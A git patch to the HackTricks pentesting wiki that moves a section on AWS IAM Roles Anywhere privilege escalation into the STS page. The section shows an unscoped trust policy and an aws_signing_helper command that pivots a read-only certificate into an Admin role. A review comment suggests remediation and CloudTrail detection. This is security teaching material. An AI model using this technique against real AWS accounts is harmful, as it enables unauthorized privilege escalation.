From 278e22cf25c6cf00a35b4a11b2bafb4e9933312c Mon Sep 17 00:00:00 2001
From: carlospolop
Date: Tue, 24 Jun 2025 15:59:59 +0200
Subject: [PATCH] UPDATE

---
 .../aws-iam-roles-anywhere-privesc.md | 50 -------------------
 .../aws-sts-privesc.md | 44 ++++++++++++++++
 2 files changed, 44 insertions(+), 50 deletions(-)
 delete mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md

diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md
deleted file mode 100644
index 3180d09a4..000000000
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md
+++ /dev/null
@@ -1,50 +0,0 @@
-# AWS - IAM Roles Anywhere Privesc
-
-{{#include ../../../../banners/hacktricks-training.md}}
-
-AWS IAM RolesAnywhere allows workloads outside AWS to assume IAM roles using X.509 certificates. But when trust policies aren't properly scoped, they can be abused for privilege escalation.
-
-This policy lacks restrictions on which trust anchor or certificate attributes are allowed. As a result, any certificate tied to any trust anchor in the account can be used to assume this role.
-
-```json
-{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "Service": "rolesanywhere.amazonaws.com"
- },
- "Action": [
- "sts:AssumeRole",
- "sts:SetSourceIdentity",
- "sts:TagSession"
- ]
- }
- ]
-}
-
-```
-
-To privesc, the `aws_signing_helper` is required from https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
-
-Then using a valid certificate the attacker can pivot into the higher privilege role
-
-```bash
-aws_signing_helper credential-process \
- --certificate readonly.pem \
- --private-key readonly.key \
- --trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \
- --profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \
- --role-arn arn:aws:iam::123456789012:role/Admin
-```
-
-
-### References
-
-- https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation/
-
-{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
index 55736918c..b602cfeea 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
@@ -119,6 +119,50 @@ aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/
 ../aws-basic-information/aws-federation-abuse.md
 {{#endref}}
 
+### IAM Roles Anywhere Privesc
+
+AWS IAM RolesAnywhere allows workloads outside AWS to assume IAM roles using X.509 certificates. But when trust policies aren't properly scoped, they can be abused for privilege escalation.
+
+This policy lacks restrictions on which trust anchor or certificate attributes are allowed. As a result, any certificate tied to any trust anchor in the account can be used to assume this role.
+
+```json
+{
+ "Version": "2012-10-17",
+ "Statement": [
+ {
+ "Effect": "Allow",
+ "Principal": {
+ "Service": "rolesanywhere.amazonaws.com"
+ },
+ "Action": [
+ "sts:AssumeRole",
+ "sts:SetSourceIdentity",
+ "sts:TagSession"
+ ]
+ }
+ ]
+}
+
+```
+
+To privesc, the `aws_signing_helper` is required from https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
+
+Then using a valid certificate the attacker can pivot into the higher privilege role
+
+```bash
+aws_signing_helper credential-process \
+ --certificate readonly.pem \
+ --private-key readonly.key \
+ --trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \
+ --profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \
+ --role-arn arn:aws:iam::123456789012:role/Admin
+```
+
+
+### References
+
+- [https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation](https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation)
+
 {{#include ../../../banners/hacktricks-training.md}}
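Review bot: The new section shows the over-permissive trust policy but never states what a correctly scoped one looks like, so a reader cannot tell which Condition actually closes the hole; after the JSON block I would add a sentence such as `A scoped trust policy pins the role to a single trust anchor with "Condition": {"ArnEquals": {"aws:SourceArn": "arn:aws:rolesanywhere:<region>:<account>:trust-anchor/<id>"}} and can further restrict the certificate subject via aws:PrincipalTag/x509Subject/CN.` Two prerequisites that the "using a valid certificate" sentence leaves implicit are also worth spelling out: the certificate must chain to a CA registered as a trust anchor in the account, and the target role must be listed in the Roles Anywhere profile passed as `--profile-arn` (profile ARNs appear to be UUID-based, so `profile/default` should be marked as a placeholder). For the defensive side, a one-line note that each such assumption is recorded as a `rolesanywhere` `CreateSession` event in CloudTrail would make the section useful for detection as well as exploitation. The hunk's trailing context lines after the banner include are not visible here, so the section may continue past what is shown.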